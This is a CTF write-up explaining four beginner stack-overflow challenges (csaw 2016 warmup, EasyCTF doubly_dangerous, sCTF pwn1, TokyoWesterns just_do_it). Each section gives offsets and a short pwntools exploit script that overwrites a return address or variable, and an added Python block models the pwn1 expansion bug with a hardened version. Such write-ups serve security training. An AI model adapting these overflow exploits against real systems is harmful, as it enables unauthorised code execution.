0x00 csaw ctf 2016 quals-warmup
A simple stack overflow problem with no protections enabled; good practice for a beginner.
Running it twice shows that the address the program prints does not change, so the problem is very simple.
The padding is 64 characters, plus 8 bytes for the saved base pointer, 72 characters in total.
from pwn import *
p = process('./warmup')
# 64 bytes of buffer + 8 bytes saved base pointer, then the return address
p.sendline(b'a' * 72 + p64(0x40060d))
p.interactive()
0x01 EasyCTF 2017 - doubly_dangerous
A 32-bit program with NX enabled.
Looking at the pseudocode, my first thought was to make v5 equal to 11.28125, but I did not know how 11.28125 is stored in memory.
Viewing 11.28125 in hexadecimal, the bytes appear as 00 80 34 41; once the byte order is taken into account, the value actually stored is 0x41348000.
On the stack the distance between s and v5 is 0x40, so 64 characters of padding are needed.
from pwn import *
p = process('./doubly_dangerous')
# 0x40 bytes from s to v5, then the IEEE-754 encoding of 11.28125
p.sendline(b'a' * 64 + p32(0x41348000))
p.interactive()
Another approach is to use s to overwrite the return address with the address of give_flag, but I tried many times and it failed.
0x02 sCTF 2016 q1 - pwn1
A 32-bit program with NX enabled.
From the pseudocode, s is limited to 32 characters, and s is 60 bytes away from ebp;
the input is then processed and every I is turned into you. So think about it: if we enter a certain number of I characters, the buffer size stays the same, but after the conversion to you the data grows, and that causes a buffer overflow that can overwrite the return address.
The most important thing here is to understand the C++ pseudocode, which I still do not understand ~~
from pwn import *
p = process('./pwn1')
# 21 x 'I' expand to 63 bytes of 'you'; with one more byte that is 64,
# reaching the return address (60 bytes of buffer + 4 bytes saved ebp)
p.sendline(b'I' * 21 + b'a' + p32(0x08048F0D))
p.interactive()
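As an added example (not part of the original writeup, and not code from the challenge binaries), the following Python checks the two numbers the doubly_dangerous and pwn1 sections rely on: the in-memory encoding of 11.28125, and how far an I-to-you expansion into a fixed-size buffer overshoots. The function names, the 32-byte input limit and the 60-byte buffer model are assumptions taken from the text above.

```python
# Added example, not from the original writeup. Identifiers and sizes are assumptions.
import struct


def float_as_hex(value: float) -> int:
    """IEEE-754 single-precision encoding of `value`, as an integer."""
    return struct.unpack('<I', struct.pack('<f', value))[0]


def float_memory_bytes(value: float) -> bytes:
    """The same float as it sits in memory on a little-endian x86 machine."""
    return struct.pack('<f', value)


def expand_input(data: bytes, limit: int) -> bytes:
    """Model of the pwn1 filter: the raw input is capped at `limit` bytes and
    only afterwards every b'I' is rewritten as b'you', so the result can be
    longer than `limit` (the length check is done on the wrong string)."""
    return data[:limit].replace(b'I', b'you')


def overflow_bytes(data: bytes, limit: int, buf_size: int) -> int:
    """How many bytes the expanded input spills past a `buf_size` buffer."""
    return max(0, len(expand_input(data, limit)) - buf_size)


def expand_input_safe(data: bytes, limit: int, buf_size: int) -> bytes:
    """Hardened variant: bound the *expanded* length, never the raw input."""
    out = bytearray()
    for ch in data[:limit]:
        piece = b'you' if ch == ord('I') else bytes([ch])
        if len(out) + len(piece) > buf_size:
            break
        out += piece
    return bytes(out)


if __name__ == '__main__':
    print(hex(float_as_hex(11.28125)))          # 0x41348000
    print(float_memory_bytes(11.28125).hex())   # 00803441
    sample = b'I' * 21 + b'a'                   # constructed input, 22 bytes
    print(len(expand_input(sample, 32)))        # 64
    print(overflow_bytes(sample, 32, 60))       # 4
    print(len(expand_input_safe(sample, 32, 60)))  # 60
```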
0x03 TokyoWesterns CTF 3rd 2017 - just_do_it
A 32-bit program with NX enabled.
From the pseudocode, the buffer compared with strcmp can be overflowed.
The padding works out to 20 characters.
from pwn import *
p = process('./just_do_it')
# 20 bytes of padding, then the address to place in the overwritten slot
p.sendline(b'a' * 20 + p32(0x0804A080))
p.interactive()